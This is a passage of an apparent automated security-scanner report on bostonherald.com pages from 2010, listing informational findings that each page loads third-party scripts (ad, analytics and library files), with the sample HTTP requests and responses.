...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

9.24. http://bostonherald.com/business/healthcare/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/business/healthcare/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects
http://cache.heraldinteractive.com/js/ajax.js
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /business/healthcare/ HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=1.247838239.1289175481.1289175481.1289175481.1; __utmc=1; __utmb=1.3.10.1289175481; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 02:50:35 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 51714

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

<!-- // subsection_chi.tmpl //
...[SNIP]...
<meta name="y_key" content="cb9ab47057816fba" />

<script src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

9.25. http://bostonherald.com/business/healthcare/view/20101107regulation_hurts_medical_supplier/format=comments&srvc=home&position=5 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/business/healthcare/view/20101107regulation_hurts_medical_supplier/format=comments&srvc=home&position=5

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 08:16:46 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 91839

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

9.26. http://bostonherald.com/business/healthcare/view/20101107regulation_hurts_medical_supplier/srvc=home&position=5 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/business/healthcare/view/20101107regulation_hurts_medical_supplier/srvc=home&position=5

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /business/healthcare/view/20101107regulation_hurts_medical_supplier/srvc=home&position=5 HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=235728274.418299420.1289175424.1289175424.1289175424.1; __utmc=235728274; __utmb=235728274.16.10.1289175424; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8|O1021J6R; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 08:16:41 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 39906

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

9.27. http://bostonherald.com/business/media/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/business/media/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects
http://cache.heraldinteractive.com/js/ajax.js
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /business/media/ HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=1.247838239.1289175481.1289175481.1289175481.1; __utmc=1; __utmb=1.3.10.1289175481; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 02:37:08 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 50950

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

<!-- // subsection_chi.tmpl //
...[SNIP]...
<meta name="y_key" content="cb9ab47057816fba" />

<script src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

9.28. http://bostonherald.com/business/media/view/20101107megamind_has_mega_debut_with_477m/srvc=home&position=also previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/business/media/view/20101107megamind_has_mega_debut_with_477m/srvc=home&position=also

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /business/media/view/20101107megamind_has_mega_debut_with_477m/srvc=home&position=also HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=235728274.418299420.1289175424.1289175424.1289175424.1; __utmc=235728274; __utmb=235728274.16.10.1289175424; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8|O1021J6R; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 08:14:32 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 42346

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

9.29. http://bostonherald.com/business/media/view/20101107olbermann_suspension_highlights_ethics_rules/srvc=home&position=also previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/business/media/view/20101107olbermann_suspension_highlights_ethics_rules/srvc=home&position=also

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /business/media/view/20101107olbermann_suspension_highlights_ethics_rules/srvc=home&position=also HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=235728274.418299420.1289175424.1289175424.1289175424.1; __utmc=235728274; __utmb=235728274.16.10.1289175424; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8|O1021J6R; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 08:13:05 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 41906

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

9.30. http://bostonherald.com/business/real_estate/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/business/real_estate/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects
http://cache.heraldinteractive.com/js/ajax.js
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js

Request

GET /business/real_estate/ HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=1.247838239.1289175481.1289175481.1289175481.1; __utmc=1; __utmb=1.3.10.1289175481; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 02:34:33 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 59585

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" >
<head>

<!-- // subsection_chi.tmpl //
...[SNIP]...
<meta name="y_key" content="cb9ab47057816fba" />

<script src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js" type="text/javascript"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/common.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/ajax.js" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

9.31. http://bostonherald.com/business/real_estate/view/20101106jp_starter_condo_has_charm/srvc=home&position=also previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/business/real_estate/view/20101106jp_starter_condo_has_charm/srvc=home&position=also

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
http://cache.heraldinteractive.com/js/tab_control.js?1=21
http://d.yimg.com/ds/badge2.js
http://edge.quantserve.com/quant.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://s7.addthis.com/js/200/addthis_widget.js

Request

GET /business/real_estate/view/20101106jp_starter_condo_has_charm/srvc=home&position=also HTTP/1.1
Host: bostonherald.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: bhfont=12; tmq=kvq%3DD%3Bkvq%3DT%3Bkvq%3D2960%3Bkvq%3D2789%3Bkvq%3D2517%3Bkvq%3D2516%3Bkvq%3D2513%3Bkvq%3D2512%3Bkvq%3D2504%3Bkvq%3D2098%3Bkvq%3D2089%3Bkvq%3D2082%3Bkvq%3D2078%3Bkvq%3D1130%3Bkvq%3D1129%3Bkvq%3D1128%3Bkvq%3D1127%3Bkvq%3D963%3Bkvq%3D773; __utmz=1.1289175481.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); bhpopup=on; OAX=rnoX2kzXQXwACWRq; __utma=235728274.418299420.1289175424.1289175424.1289175424.1; __utmc=235728274; __utmb=235728274.16.10.1289175424; __qca=P0-1292731211-1289175424376; RMFD=011PFFPzO101yed8|O1021J6R; clientId=c488e846-1720-dMzs-k80V-lGgGUc54zAOC;

Response

HTTP/1.1 200 OK
Date: Mon, 08 Nov 2010 08:03:51 GMT
Server: Apache
X-Powered-By: PHP/5.2.0-8+etch16
Content-Type: text/html; charset=UTF-8
Connection: close
Content-Length: 40403

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd" >
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>



<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js"></script>
<script src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder" type="text/javascript"></script>

<script src="http://cache.heraldinteractive.com/js/tab_control.js?1=21" type="text/javascript"></script>
<script src="http://cache.heraldinteractive.com/js/businessSummary.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/dropdown.js" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/common.js?1=21" type="text/javascript"></script>
   <script src="http://cache.heraldinteractive.com/js/scriptaculous/global.js" type="text/javascript"></script>


       <script src="http://cache.heraldinteractive.com/js/ajax.js?nocache=1234" type="text/javascript"></script>
...[SNIP]...
</script>

   <script src="http://cache.heraldinteractive.com/js/navigation.js" type="text/javascript"></script>
...[SNIP]...
</script>
   -->

<script type="text/javascript" src="http://s7.addthis.com/js/200/addthis_widget.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://d.yimg.com/ds/badge2.js" badgetype="text"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://pagead2.googlesyndication.com/pagead/show_ads.js">
</script>
...[SNIP]...
</script>
<script type="text/javascript"
src="http://edge.quantserve.com/quant.js"></script>
...[SNIP]...

9.32. http://bostonherald.com/business/real_estate/view/20101106mansion_to_be_auctioned_site_once_owned_by_infamous_tyco_exec/srvc=home&position=also previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bostonherald.com
Path:	/business/real_estate/view/20101106mansion_to_be_auctioned_site_once_owned_by_infamous_tyco_exec/srvc=home&position=also

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.6.1/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.8.3/scriptaculous.js?load=effects,builder
http://cache.heraldinteractive.com/js/ajax.js?nocache=1234
http://cache.heraldinteractive.com/js/businessSummary.js
http://cache.heraldinteractive.com/js/common.js?1=21
http://cache.heraldinteractive.com/js/dropdown.js
http://cache.heraldinteractive.com/js/navigation.js
http://cache.heraldinteractive.com/js/scriptaculous/global.js
